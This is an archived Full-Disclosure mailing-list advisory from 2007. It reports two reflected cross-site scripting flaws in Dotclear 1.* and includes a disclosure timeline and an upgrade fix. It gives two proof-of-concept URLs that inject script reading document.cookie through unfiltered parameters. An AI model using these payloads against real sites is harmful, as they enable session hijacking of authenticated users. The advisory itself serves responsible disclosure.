[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability
From: "nssimo nssimo" <nsimou@xxxxxxxxx>
Date: Thu, 12 Apr 2007 12:16:49 +0000

Dotclear 1.*  Cross Site Scripting Vulnerability


1--two cross site scripting vulnerabilities have been discovered in the
dotclear1.*  allowing a remote  attackers to hijack authenticated session
Workaround:
$post_id (trackback.php)
$tool_url(/tools/thememng/index.php)
are not filtered
2-Proof of Concepts:
dotclear/ecrire/trackback.php?post_id="><script>alert(document.cookie
);</script>

/ecrire/tools.php?tool_url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&p=thememng


3-Disclosure timeline
05/04/2007   dotclear team contacted
10/04/2007  fixed

4-solution:
upgrade to dotclear 1.2.6
http://www.dotclear.net/

found by nassim
http://www.securlabs.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] INFIGO-2007-04-05: Enterprise Security Analyzer server remote buffer overflows
Next by Date: Re: [Full-disclosure] Let's Winnuke Google!
Previous by thread: [Full-disclosure] INFIGO-2007-04-05: Enterprise Security Analyzer server remote buffer overflows
Next by thread: [Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability
Index(es):
- Date
- Thread